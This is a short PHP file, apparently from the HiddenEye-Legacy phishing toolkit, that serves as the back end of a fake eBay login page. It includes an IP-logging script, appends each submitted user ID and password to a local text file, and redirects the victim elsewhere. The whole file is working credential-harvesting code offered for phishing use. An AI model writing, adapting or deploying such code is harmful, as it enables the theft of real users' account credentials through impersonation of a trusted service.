HiddenEye-Legacy/WebPages/ebay/login.php
2019-04-21 10:08:25 +00:00

7 lines
180 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['userid'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();